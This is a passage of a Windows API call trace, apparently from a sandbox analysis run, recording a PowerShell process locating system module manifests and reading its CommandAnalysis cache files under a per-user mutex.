cHandles=0x1, pHandles=0x653ef8d550*=0x984, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.283] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff040 [0282.283] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff040, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.283] CoTaskMemFree (pv=0x25b73cff040) [0282.283] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0282.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.283] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c757790 | out: lpFileInformation=0x25b5c757790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368)) returned 1 [0282.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.283] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.284] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.284] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_a2539131-4889-4bfa-9cd2-9c1d6af613cf", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_a2539131-4889-4bfa-9cd2-9c1d6af613cf", lpFilePart=0x0) returned 0x93 [0282.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.284] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_a2539131-4889-4bfa-9cd2-9c1d6af613cf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_a2539131-4889-4bfa-9cd2-9c1d6af613cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x988 [0282.285] GetFileType (hFile=0x988) returned 0x1 [0282.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.285] GetFileType (hFile=0x988) returned 0x1 [0282.285] ReadFile (in: hFile=0x988, lpBuffer=0x25b5c758a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c758a48*, lpNumberOfBytesRead=0x653ef8d338*=0x5a1, lpOverlapped=0x0) returned 1 [0282.287] ReadFile (in: hFile=0x988, lpBuffer=0x25b5c758a48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c758a48*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.287] CloseHandle (hObject=0x988) returned 1 [0282.287] ReleaseMutex (hMutex=0x984) returned 1 [0282.287] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0282.287] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb4c0 [0282.287] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb4c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.287] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.287] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0282.287] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.287] CoTaskMemFree (pv=0x25b73d01680) [0282.288] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.288] GetCurrentProcess () returned 0xffffffffffffffff [0282.288] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x988) returned 1 [0282.288] GetTokenInformation (in: TokenHandle=0x988, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.288] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739850b0 [0282.288] GetTokenInformation (in: TokenHandle=0x988, TokenInformationClass=0x1, TokenInformation=0x25b739850b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739850b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.288] LocalFree (hMem=0x25b739850b0) returned 0x0 [0282.288] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c75d400, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c75d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.288] CreateMutexW (lpMutexAttributes=0x25b5c75d550, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x98c [0282.289] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x98c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.289] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0282.289] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.289] CoTaskMemFree (pv=0x25b73d01680) [0282.289] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0282.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.289] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c75dba0 | out: lpFileInformation=0x25b5c75dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0282.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.289] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.289] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.290] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_1cc363fc-fd33-403d-b8fa-964af616746c", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_1cc363fc-fd33-403d-b8fa-964af616746c", lpFilePart=0x0) returned 0x93 [0282.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.290] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_1cc363fc-fd33-403d-b8fa-964af616746c" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_1cc363fc-fd33-403d-b8fa-964af616746c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x990 [0282.291] GetFileType (hFile=0x990) returned 0x1 [0282.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.291] GetFileType (hFile=0x990) returned 0x1 [0282.291] ReadFile (in: hFile=0x990, lpBuffer=0x25b5c75ee28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c75ee28*, lpNumberOfBytesRead=0x653ef8d338*=0x3f8, lpOverlapped=0x0) returned 1 [0282.293] ReadFile (in: hFile=0x990, lpBuffer=0x25b5c75ee28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c75ee28*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.293] CloseHandle (hObject=0x990) returned 1 [0282.293] ReleaseMutex (hMutex=0x98c) returned 1 [0282.293] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0282.293] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0282.293] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.293] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.293] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfae60 [0282.293] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfae60 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.294] CoTaskMemFree (pv=0x25b73cfae60) [0282.294] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.294] GetCurrentProcess () returned 0xffffffffffffffff [0282.294] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x990) returned 1 [0282.294] GetTokenInformation (in: TokenHandle=0x990, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.294] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984330 [0282.294] GetTokenInformation (in: TokenHandle=0x990, TokenInformationClass=0x1, TokenInformation=0x25b73984330, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984330, ReturnLength=0x653ef8d6b8) returned 1 [0282.295] LocalFree (hMem=0x25b73984330) returned 0x0 [0282.295] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c763100, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c763100*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.295] CreateMutexW (lpMutexAttributes=0x25b5c763250, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x994 [0282.295] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x994, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.296] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01020 [0282.296] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01020, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.296] CoTaskMemFree (pv=0x25b73d01020) [0282.296] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0282.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.296] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c763888 | out: lpFileInformation=0x25b5c763888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352)) returned 1 [0282.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.296] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_460645de-0b19-4be1-bf3e-f69457b02cf0", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_460645de-0b19-4be1-bf3e-f69457b02cf0", lpFilePart=0x0) returned 0x93 [0282.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.296] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_460645de-0b19-4be1-bf3e-f69457b02cf0" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_460645de-0b19-4be1-bf3e-f69457b02cf0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x998 [0282.298] GetFileType (hFile=0x998) returned 0x1 [0282.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.298] GetFileType (hFile=0x998) returned 0x1 [0282.298] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c764af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c764af8*, lpNumberOfBytesRead=0x653ef8d338*=0x774, lpOverlapped=0x0) returned 1 [0282.300] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c764af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c764af8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.300] CloseHandle (hObject=0x998) returned 1 [0282.300] ReleaseMutex (hMutex=0x994) returned 1 [0282.300] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0282.300] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfce40 [0282.300] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfce40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.300] CoTaskMemFree (pv=0x25b73cfce40) [0282.300] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfc7e0 [0282.300] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfc7e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.301] CoTaskMemFree (pv=0x25b73cfc7e0) [0282.301] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.301] GetCurrentProcess () returned 0xffffffffffffffff [0282.301] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x998) returned 1 [0282.301] GetTokenInformation (in: TokenHandle=0x998, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.301] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984f70 [0282.301] GetTokenInformation (in: TokenHandle=0x998, TokenInformationClass=0x1, TokenInformation=0x25b73984f70, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984f70, ReturnLength=0x653ef8d6b8) returned 1 [0282.302] LocalFree (hMem=0x25b73984f70) returned 0x0 [0282.302] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7699f8, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7699f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.302] CreateMutexW (lpMutexAttributes=0x25b5c769b48, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x99c [0282.302] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x99c, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.302] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfac40 [0282.302] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfac40, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.302] CoTaskMemFree (pv=0x25b73cfac40) [0282.302] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0282.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.302] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c76a1a8 | out: lpFileInformation=0x25b5c76a1a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198)) returned 1 [0282.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.303] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b26348fb-213f-4f36-865f-94d0590299bf", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b26348fb-213f-4f36-865f-94d0590299bf", lpFilePart=0x0) returned 0x93 [0282.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.303] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b26348fb-213f-4f36-865f-94d0590299bf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_b26348fb-213f-4f36-865f-94d0590299bf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, 